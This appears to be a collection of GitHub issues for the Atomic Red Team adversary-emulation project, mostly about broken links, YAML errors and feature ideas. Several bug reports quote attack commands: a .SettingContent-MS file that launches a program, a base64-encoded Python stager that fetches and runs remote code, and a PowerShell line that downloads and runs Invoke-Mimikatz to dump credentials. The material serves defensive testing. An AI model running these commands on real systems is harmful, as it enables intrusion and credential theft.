Report

Currently the execution frameworks are not intuitive to help guide someone new to Atomic to know where to begin to run tests.

So perhaps we need to add a quick pointer to each framework with a brief description.

Clicking on any of the links in the home page literally does nothing lol. Specifically of value: Quick Start: Using Atomic Red Team to test your security

Slack channel does not allow users to join: Contact the workspace administrator for an invitation

Seems like a great project and everything, but the documentation is literally nonexistant and so there is no way to use it. Sad.

Example of .SettingContent-MS soon to be added to the ATT&CK Matrix

<?xml version="1.0" encoding="UTF-8"?> <PCSettings> <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent"> <ApplicationInformation> <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID> <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink> <Icon>%windir%\system32\control.exe</Icon> </ApplicationInformation> <SettingIdentity> <PageID></PageID> <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID> </SettingIdentity> <SettingInformation> <Description>@shell32.dll,-4161</Description> <Keywords>@shell32.dll,-4161</Keywords> </SettingInformation> </SearchableContent> </PCSettings>

References:
https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8
https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/

I moved removed the LD_PRELOAD test out of the rootkit technique. I believe this is better described in T1055 Process Injection

This is a note for me to fix this when I have time.

With the current directory structure, any techniques that work on Windows, Mac, and Linux must be duplicated. This is cumbersome for when one of them changes, as then the other two must also be changed in the same way.

This could be addressed by making a Common directory which contains cross-platform resources. The READMEs in each of the OS-specific directories could then link back to resources in the Common directory.

Unsure if a PR would be better, but I wanted to possibly contribute a new execution framework that is an Ansible plugin.

https://github.com/tuckner/ansible-art

The plugin would be a part of Ansible's software package but would execute atomic techniques across Windows & Linux.

Report

There appears to be a bug in the Get-AtomicTechnique

What did you do?

Get-AtomicTechnique -Path .\atomics\T1117\T1117.yaml

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName

325      19     7604      25452       0.56   5652   1 ApplicationFrameHost
158      10     6332      11480       0.73   9048   0 audiodg
329      16     5212      20804       0.06   8380   1 backgroundTaskHost
174      11     2048       8140       0.03    736   1 chrome
142      11     1972       8780       0.03   5896   1 chrome

What did you expect to happen?

I expected to create a test.

What happened instead?

The current state, it runs Get-Process and dies.

Your Environment

Windows 10 x64 v1803

@rickardja if you have a chance can you check the code for the Get-AtomicTechnique method, or perhaps we need to update the documentation. Thanks!

https://github.com/hfiref0x/UACME

Might be worth including those in your UAC testing suite.

Atomic Test #13 - wbadmin
"wbdadmin delete catalog -quiet" is not working.

What did you expect to happen?

wbdadmin should be wbadmin instead.

OS: Windows10 Enterprise.

Hi, when executing a test in a windows system I get a failure on test report creation because the script tries to create a file with an invalid name:

` - Writing results to atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml

FATAL ERROR: Invalid argument @ rb_sysopen - atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml`

Is there a possibility of adding a JSON output of the current Markdowns?

I have made an attempt using md_to_json via: pip install markdown_to_json

However the tool (md_to_json) itself isn't properly suited. So there has been some modification to the layout of the markdowns to get the expected output.

Example: https://github.com/m0jtaba/atomic-red-team/blob/feature/json/Linux/Command_and_Control/Remote_File_Copy.json

https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Registry_Run_Keys_Start_folder.md

linked from https://github.com/redcanaryco/atomic-red-team/tree/master/Windows
is 404

it should be

https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Registry_Run_Keys_Start_Folder.md

Report

Presently, each test is fairly static.

A recent presentation by @danielbohannon and @matthewdunwoody

https://www.slideshare.net/DanielBohannon2/signaturesaredead-long-live-resilient-signatures

Serve as a reminder that tests need to be more dynamic, less defenders get complacent with curent detections.

I propose some sort of dynamic configuration file that can be applied to a test. To change things like file name, command line arguments, etc...

Open to feedback. Just wanted to track as an issue to come back to when we have time.

Report

I think this test should create a share then delete it. For completeness

atomic-red-team/atomics/T1002/T1002.yaml

while scanning an alias
in "", line 34, column 16:
default: *.docx
^
expected alphabetic or numeric character, but found '.'
in "", line 34, column 17:
default: *.docx
^

I bit of googling suggests if you want to have * at the beginning you will need to put it quotes

This test case, the linux test is missing the test prologue.

This causes a parsing error "Duplicate Key" when parsing the yaml

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.yaml#L91

After further review. T1074 is a complete mess. Needs reworked for both PowerShell and LInux last 2 tests

When you download the Atomic Repo, Windows will block many scripts. This is a normal default mechanism to prevent some material from the internet from executing.

In order to over come this, perhaps we can add this to our Invoke-AtomicRedTeam module.

Get-ChildItem -Path 'C:\AtomicRedTeam' -Recurse | Unblock-File

https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct

A question was posed in the Atomic Channel about checking wether or not a test requires admin (Windows ) or root privileges.

I support this idea. Just need to think through where to put that check.
Update validation scripts
Retroactively update existing tests to have this added to all the existing test.

Report

Create a simple test to create and execute 3-4 tests.
Use case: Someone just wants a quick way to run Atomic Red Team.

Report

T1086 Atomic Test #6 is false，The correct way is first execution $Password = Read-Host -AsSecureString，Then execution New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'

and the true is Run it with powershell，not Run it with command_prompt，Your introduction is wrong.

What did you do?

ℹ Please replace this with what you did.
New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'

What did you expect to happen?

ℹ Please replace this with what you expected to happen.
Successfully created an account

What happened instead?

ℹ Please replace this with of what happened instead.
error info:
New-LocalUser : 无法绑定参数“Password”。无法将“System.String”类型的“password”值转换为“System.Security.SecureStri
ng”类型。

Your Environment

• Which specific operating system are you running (e.g. Windows 7 SP1 32-bit)?
  win10 1709

• Did you run the test from an elevated or root prompt?
  yes

• If relevant, which atomic test is this specific to?
  T1086 Atomic Test #6

• If relevant, which execution harness are you attempting to use?
  powershell

Report

What did you do?

Run https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1

What did you expect to happen?

Script ¿should? log keystrokes at key.log

What happened instead?

nothing

Your Environment

• Windows 10, 64 bits
• Did you run the test from an elevated or root prompt? Yes
• If relevant, which atomic test is this specific to? T1056
• If relevant, which execution harness are you attempting to use? -

Report

As reported in the Atomic Slack Chanel, Test T1122 COM hijack needs a new CLSID.

{372FCE38-4324-11D0-8810-00A0C903B83C} is no longer viable.

Probably the best plan forward is to just rewrite this test to look for reg mods of existing CLSIDs

references:
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/

https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com

T1099

the target_filename input parameter does not have a default value.

Thanks

Sometimes we use powershell, powershell.exe and sometimes nothing.

We need to review each powershell test and choose a consistent pattern.

Compare 1086, 1050 and 1098 for examples.

Afternoon

I have been using msxsl.exe lately and its been quite effective. I looked through all your red team stuff and couldn't find it. Below are some references for you, maybe you can add it to your lists.

• https://pentestlab.blog/tag/msxsl/
• https://twitter.com/subTee/status/877616321747271680
• https://www.virustotal.com/#/file/42987d5db98c59779831681cdabefb9622f9ab57ebf5bdb7354b74aac46512c8/community

Anyways food for thought.

I have a problem with this technique. I tested DLL(Win32/x64) files using Mavinject command but ain't working right. I used notepad.exe for ProcessID and also, disabled my anti-virus solution. Got any suggestions?

Report

For every reg.exe add, you need a reg.exe delete to clean up the target system.

The Following Techniques Need to Be Corrected.
1042
1053
1065
1075
1103
1124
1191

There are inconsistencies in the input_arguments and the command property.

Example: T1042

---
attack_technique: T1042
display_name: Change Default File Association

atomic_tests:
- name: Change Default File Association
  description: |
    Change Default File Association From cmd.exe

  supported_platforms:
    - windows
  input_arguments:
    extension_to_change:
      description: File Extension To Hijack
      type: String
      default: .wav
    target_exenstion_handler:   <<<<<<<< THIS SHOULD MATCH 
      description: Thing To Open
      type: Path
      default: C:\Program Files\Windows Media Player\wmplayer.exe
  executor:
    name: command_prompt
    command: |
      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"  <<<<<< THIS 

target_extension_handler s/b renamed to thing_to_execute Or vice versa

My recommendation is once we fix these that the validation routine be updated to check this.

As discussed in the Channel it would be great to have a the ability to check a dependency is on the box you are running the test from. For example LOLbins such as mavinject (T1055). In my testing (Win10 Enterprise x64) this is not always installed by default unless you have installed a click to run MS installer.

In reviewing this page:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/linux-index.md

I found that nearly all the Lateral Movement tests (as well as others on the page) are pointed to a dead link:

https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTING.md

Once all url references are fixed we can merge this branch
https://github.com/redcanaryco/atomic-red-team/tree/Discovery

example:

S/b updated to
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

Hi All,
Please forgive my newbie-ness, if this is not the correct forum for this idea or if the functionality I’m explaining below doesn’t already exist, please let me know. I noticed the “Generate All Tests” code on this page: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks/Invoke-AtomicRedTeam

I am looking for a simple command to run many or all tests applicable by OS that creates a test report to compare to. I’m thinking there are many people like me who just want to quickly test my shiny new detection method (EDR tool, sysmon setup or SIEM integration) by running one simple command. I’m really hoping the command will output a report. The report can be then used to support a manual comparison to shiny new detection method on a wide scale of techniques post-execution. I think having this functionality easily accessible and documented will be great.

The command should:
• Run a list of tests, all tests by tactic or all tests (default).
• Insert some delay time in between each command execution, perhaps 1 minute default. This will allow for greater confidence in detection when comparing shiny new detection method to test output report.
• *Add command execution validation (Ex/ T1117 did a new instance of calc.exe execute?) Being so new to the framework, I’m assuming not all techniques pop calc.exe.
• Output a CSV or XML report of actions. Report Fields:

• From Command/Script: Hostname, Host IP, Execution Date/Time
• From YAML: attack_technique, display_name, name, description, input arguments, executor, name, command
• End users can later add custom fields like “Detected”, “Detected by; SIEM, EDR, etc..”, or Maturity Level to track progress.

• Include techniques with missing tests as “No Atomic Test Available – Please submit a test! https://github.com/redcanaryco/atomic-red-team/blob/master/docs/contributing.md#how-to-contribute” in output
• Summary: Number of tests completed/successful, failed, not applicable, missing tests (by tactic and total)
• Can be user interactive or non-interactive to bypass prompts

Questions for community:

1. What flaws are there with this concept?
2. Does this functionality already exist?
3. *Is there a concept of confirming a test executor’s command as success or failed? (like STERR)

I noticed the code Invoke-AtomicRedTeam\Public\Invoke-AtomicTest.ps1
has a “foreach ($technique in $AtomicTechnique)” and “foreach ($test in $technique.atomic_tests)” loops but it is not intuitive to how to run and I don’t see a report output option. See #432

Thank you!

Example: T1002
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml

input arguments are:

input_arguments:
    input_file:
      description: Path that should be compressed into our output file
      type: Path
      default: C:\*

the input_file variable then contains the following based on parsing the yaml:
{'description': 'Path that should be compressed into our output file', 'type': 'Path', 'default': 'C:\\*'}

command then takes:

executor:
    name: powershell
    command: |
      dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}

thus you are passing a dict to the command part

i assume it should be something like #{input_file.default} or #{input_file['default']} whatever makes sense here

https://attack.mitre.org/wiki/Technique/T1036

Can be achieved by copying one process to have the filename of a Windows system process for execution. Essentially impersonating a Windows system process.

We identified that the matrices were out of date (missing T1220, for example) and it is possibly caused by the ATT&CK API change.

We need to create a NuGetApiKey for publishing Invoke-AtomicRedTeam to powershellgallery.com. This also requires an update for circleci YAML.

Per Josh Rickard (MSAdministrator), he's provided an example AppVeyor configuration for this:
https://github.com/MSAdministrator/PSNamedPipe/blob/master/appveyor.yml

Report

T1127 MSBuild Bypass Using Inline Tasks Test needs path pointing to src
Currently just has file name
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.yaml#L14
Should be relative or full path

Report

Validation script errors on /atomic_red_team/atomic_test_template.yaml

Suggested Fix:
Create an Exclusion for that file.

@brianebeyer thoughts?

Example Output:

Validating ./atomic_red_team/atomic_test_template.yaml...FAIL
atomic_tests[0].name contains a TODO

The example test on the main page does not work. The URL seems to be case-sensitive, and instead of:

https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1117/RegSvr32.sct

it should be

https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct

(Tested on Windows 7)

Report

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1122/T1122.yaml

This is the completely wrong test.

Report

What did you do?

Ran test T1155 and got this error, -sh: syntax error near unexpected token `'ignore''
osascript "do shell script "echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));" | python &""

What did you expect to happen?

Atomic test T1155 executes

What happened instead?

-sh: syntax error near unexpected token `'ignore''

Your Environment

MacOS High Sierra version 10.13.6

• Did you run the test from an elevated or root prompt? NO
• If relevant, which atomic test is this specific to? T1155 for MacOS
• If relevant, which execution harness are you attempting to use?

https://github.com/redcanaryco/atomic-red-team/blob/yaml-cs/atomics/T1002/T1002.yaml

If i'm reading the the various yaml's correctly you are setting the executor: powershell
and then NOT specifying the executor in the command. looks like you just have a rogue powershell.exe in this one

Report

What did you do?

Run 'chain_reaction_DragonsTail.ps1'

What did you expect to happen?

Receive all SUCCESS notifications

What happened instead?

PS C:\Users<redacted>\Desktop> .\chain_reaction_DragonsTail.ps1
SUCCESS: The scheduled task "Atomic Testing" has successfully been created.
SUCCESS: Attempted to run the scheduled task "Atomic Testing".
SUCCESS: The scheduled task "Atomic Testing" was successfully deleted.
powershell.exe : Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At C:\Users<redacted>\Desktop\chain_reaction_DragonsTail.ps1:21 char:1

• powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https: ...

•   + CategoryInfo          : NotSpecified: (Exception calli...04) Not Found.":String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
  

At line:1 char:1

• IEX (New-Object Net.WebClient).DownloadString('https://raw.githubuser ...

•   + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
  

Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:157

• ... aster/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCr ...

•                                               ~~~~~~~~~~~~~~~
  

  • CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException

Your Environment

Windows 10 64-bit
https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat

Callouts to this repo for binaries result in 404.

I think each test needs to provide a cleanup mechanism. We can decide whether to include that in the executor.command. or as a seperate yaml property.

Example: T1050 Creates a Service, but makes no attempt to clean up.

I proposes for T1050 something like this.

sc.exe create
sc.exe start
sc.exe stop
sc.exe delete

To be complete each test should stand alone.

I think this is best practice. @brianebeyer , I would be interested in your thoughts here.

The use of a tag with a release would facilitate the integration of atomic red team in Kali, see https://bugs.kali.org/view.php?id=4525

Related Github doc: https://help.github.com/articles/about-releases/

Thanks!

I think T1126.yaml needs to be adjusted, the YAML file has two top level "atomic_tests" nodes instead of one.

404 on
https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Collection/Payloads/Collection/Get-keystrokes.ps1

should be:
https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/Collection/Get-Keystrokes.ps1

per request moving this over from twitter

ref:
https://twitter.com/carnal0wnage/status/994594132747317248

CG
are you guys planning to support multiple commands in in a single command item? T1105.yaml has multiple commands. perhaps they could each be an element in a list (like you are doing supported_platforms). right now you'd/I have to account for # and blank lines

BB
Take a look at https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/t1089/t1089.yaml … - isn’t completely in line with new spec yet but you’ll see the command is multiline.

Our thought was “write your commands like you’d write them in a bat/powershell/sh script and executors can invoke them as if a single script”

CG
hmmm how do you anticipate the executor invoking those? taking the blob and writing to a file and exec'ing? how would i exec all that if i only had ssh?

BB
For ssh, I think a heredoc works. Imagine the ssh+bash executor doing

ssh user@host bash <<'EOF'
<< the contents of the executor.command >>
EOF